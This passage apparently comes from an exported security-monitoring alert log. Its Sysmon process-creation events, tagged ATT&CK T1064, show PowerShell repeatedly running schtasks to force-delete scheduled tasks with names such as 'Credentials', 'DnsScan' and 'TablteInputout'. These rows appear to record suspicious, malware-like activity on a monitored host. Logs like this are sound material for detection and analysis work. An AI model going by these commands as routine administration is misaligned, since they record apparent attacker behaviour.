Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:30.437",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:02.083 +ProcessGuid: {df9fc3d3-b3b6-5ecf-0000-0010713f2700} +ProcessId: 8152 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN TablteInputout /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:02.085009500Z"",""eventRecordID"":""3082"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:02.083\r\nProcessGuid: {df9fc3d3-b3b6-5ecf-0000-0010713f2700}\r\nProcessId: 8152\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:02.083"",""processGuid"":""{df9fc3d3-b3b6-5ecf-0000-0010713f2700}"",""processId"":""8152"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN TablteInputout /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:30.400",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:02.062 +ProcessGuid: {df9fc3d3-b3b6-5ecf-0000-00108f3c2700} +ProcessId: 5948 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Credentials /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:02.064662500Z"",""eventRecordID"":""3081"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:02.062\r\nProcessGuid: {df9fc3d3-b3b6-5ecf-0000-00108f3c2700}\r\nProcessId: 5948\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 
6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:02.062"",""processGuid"":""{df9fc3d3-b3b6-5ecf-0000-00108f3c2700}"",""processId"":""5948"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Credentials /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:30.369",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:02.038 +ProcessGuid: {df9fc3d3-b3b6-5ecf-0000-0010a6392700} +ProcessId: 4364 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN WebServers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:02.041239200Z"",""eventRecordID"":""3080"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:02.038\r\nProcessGuid: {df9fc3d3-b3b6-5ecf-0000-0010a6392700}\r\nProcessId: 4364\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: 
Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:02.038"",""processGuid"":""{df9fc3d3-b3b6-5ecf-0000-0010a6392700}"",""processId"":""4364"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WebServers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:30.353",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:02.014 +ProcessGuid: {df9fc3d3-b3b6-5ecf-0000-00106a372700} +ProcessId: 7608 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsScan /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:02.016847200Z"",""eventRecordID"":""3079"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:02.014\r\nProcessGuid: {df9fc3d3-b3b6-5ecf-0000-00106a372700}\r\nProcessId: 7608\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" 
/Delete /TN DnsScan /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:02.014"",""processGuid"":""{df9fc3d3-b3b6-5ecf-0000-00106a372700}"",""processId"":""7608"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsScan /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 
2020 @ 14:19:30.338",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.988 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010a8342700} +ProcessId: 1440 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Ddrivers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.990322800Z"",""eventRecordID"":""3078"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.988\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010a8342700}\r\nProcessId: 1440\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.988"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010a8342700}"",""processId"":""1440"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Ddrivers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:30.321",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.965 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010ed322700} +ProcessId: 2936 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Bluetooths /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.969781300Z"",""eventRecordID"":""3077"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.965\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010ed322700}\r\nProcessId: 2936\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.965"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010ed322700}"",""processId"":""2936"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Bluetooths /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 